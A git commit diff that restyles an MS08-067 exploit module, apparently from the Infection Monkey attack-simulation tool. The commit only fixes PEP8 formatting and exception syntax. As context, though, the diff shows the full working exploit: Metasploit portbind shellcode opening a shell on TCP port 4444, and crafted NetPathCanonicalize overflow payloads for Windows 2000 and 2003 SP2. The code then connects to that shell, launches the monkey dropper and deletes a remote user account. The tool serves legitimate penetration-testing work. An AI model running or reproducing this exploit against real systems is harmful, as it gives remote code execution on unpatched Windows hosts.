If already touching this file, modify it for PEP8 + better exception syntax.

This commit is contained in:
Daniel Goldberg 2017-09-28 14:17:41 +03:00
parent 48ce135194
commit a27c802b11
1 changed files with 32 additions and 32 deletions


@ -9,34 +9,35 @@
import sys import sys
import time import time
import socket import socket
from enum import IntEnum
from logging import getLogger from logging import getLogger
from model.host import VictimHost
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from enum import IntEnum
from . import HostExploiter
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from model.host import VictimHost
from network import SMBFinger from network import SMBFinger
from network.tools import check_port_tcp
from tools import build_monkey_commandline from tools import build_monkey_commandline
from . import HostExploiter
try: try:
from impacket import smb from impacket import smb
from impacket import uuid from impacket import uuid
#from impacket.dcerpc import dcerpc # from impacket.dcerpc import dcerpc
from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5 import transport
from impacket.smbconnection import SessionError as SessionError1 from impacket.smbconnection import SessionError as SessionError1
from impacket.smb import SessionError as SessionError2 from impacket.smb import SessionError as SessionError2
from impacket.smb3 import SessionError as SessionError3 from impacket.smb3 import SessionError as SessionError3
except ImportError, exc: except ImportError as exc:
print str(exc) print str(exc)
print 'Install the following library to make this script work' print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1) sys.exit(1)
LOG = getLogger(__name__) LOG = getLogger(__name__)
# Portbind shellcode from metasploit; Binds port to TCP port 4444 # Portbind shellcode from metasploit; Binds port to TCP port 4444
SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
@ -61,8 +62,7 @@ SHELLCODE += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
# Payload for Windows 2000 target # Payload for Windows 2000 target
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
@ -76,7 +76,7 @@ PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
PAYLOAD_2000 += '\xeb\xcc' PAYLOAD_2000 += '\xeb\xcc'
PAYLOAD_2000 += '\x00\x00' PAYLOAD_2000 += '\x00\x00'
# Payload for Windows 2003[SP2] target # Payload for Windows 2003[SP2] target
PAYLOAD_2003 = '\x41\x00\x5c\x00' PAYLOAD_2003 = '\x41\x00\x5c\x00'
PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00' PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
@ -95,11 +95,11 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
class WindowsVersion(IntEnum): class WindowsVersion(IntEnum):
Windows2000 = 1 Windows2000 = 1
Windows2003_SP2 = 2 Windows2003_SP2 = 2
class SRVSVC_Exploit(object): class SRVSVC_Exploit(object):
TELNET_PORT = 4444 TELNET_PORT = 4444
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445): def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
self._port = port self._port = port
self._target = target_addr self._target = target_addr
@ -110,33 +110,33 @@ class SRVSVC_Exploit(object):
The port on which the Telnet service will listen. The port on which the Telnet service will listen.
""" """
return SRVSVC_Exploit.TELNET_PORT return SRVSVC_Exploit.TELNET_PORT
def start(self): def start(self):
"""start() -> socket """start() -> socket
Exploit the target machine and return a socket connected to it's Exploit the target machine and return a socket connected to it's
listening Telnet service. listening Telnet service.
""" """
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
LOG.debug("Initiating exploit connection (%s)", target_rpc_name) LOG.debug("Initiating exploit connection (%s)", target_rpc_name)
self._trans = transport.DCERPCTransportFactory(target_rpc_name) self._trans = transport.DCERPCTransportFactory(target_rpc_name)
self._trans.connect() self._trans.connect()
LOG.debug("Connected to %s", target_rpc_name) LOG.debug("Connected to %s", target_rpc_name)
self._dce = self._trans.DCERPC_class(self._trans) self._dce = self._trans.DCERPC_class(self._trans)
self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
dce_packet = self._build_dce_packet() dce_packet = self._build_dce_packet()
self._dce.call(0x1f, dce_packet) #0x1f (or 31)- NetPathCanonicalize Operation self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
LOG.debug("Exploit sent to %s successfully...", self._target) LOG.debug("Exploit sent to %s successfully...", self._target)
LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port()) LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port())
sock = socket.socket() sock = socket.socket()
sock.connect((self._target, self.get_telnet_port())) sock.connect((self._target, self.get_telnet_port()))
return sock return sock
@ -162,7 +162,7 @@ class SRVSVC_Exploit(object):
dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00' dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00'
dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00' dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00'
dce_packet += '\x01\x00\x00\x00' dce_packet += '\x01\x00\x00\x00'
return dce_packet return dce_packet
@ -186,7 +186,7 @@ class Ms08_067_Exploiter(HostExploiter):
smb_finger = SMBFinger() smb_finger = SMBFinger()
if smb_finger.get_host_fingerprint(host): if smb_finger.get_host_fingerprint(host):
return host.os.get('type') in self._target_os_type and \ return host.os.get('type') in self._target_os_type and \
host.os.get('version') in self._windows_versions.keys() host.os.get('version') in self._windows_versions.keys()
return False return False
def exploit_host(self, host, depth=-1, src_path=None): def exploit_host(self, host, depth=-1, src_path=None):
@ -218,7 +218,7 @@ class Ms08_067_Exploiter(HostExploiter):
LOG.debug("Exploited into %r using MS08-067", host) LOG.debug("Exploited into %r using MS08-067", host)
exploited = True exploited = True
break break
except Exception, exc: except Exception as exc:
LOG.debug("Error exploiting victim %r: (%s)", host, exc) LOG.debug("Error exploiting victim %r: (%s)", host, exc)
continue continue
@ -256,15 +256,15 @@ class Ms08_067_Exploiter(HostExploiter):
build_monkey_commandline(host, depth - 1) build_monkey_commandline(host, depth - 1)
try: try:
sock.send("start %s\r\n" % (cmdline, )) sock.send("start %s\r\n" % (cmdline,))
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add, )) sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
except Exception, exc: except Exception as exc:
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc) LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc)
return False return False
finally: finally:
try: try:
sock.close() sock.close()
except: except socket.error:
pass pass
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",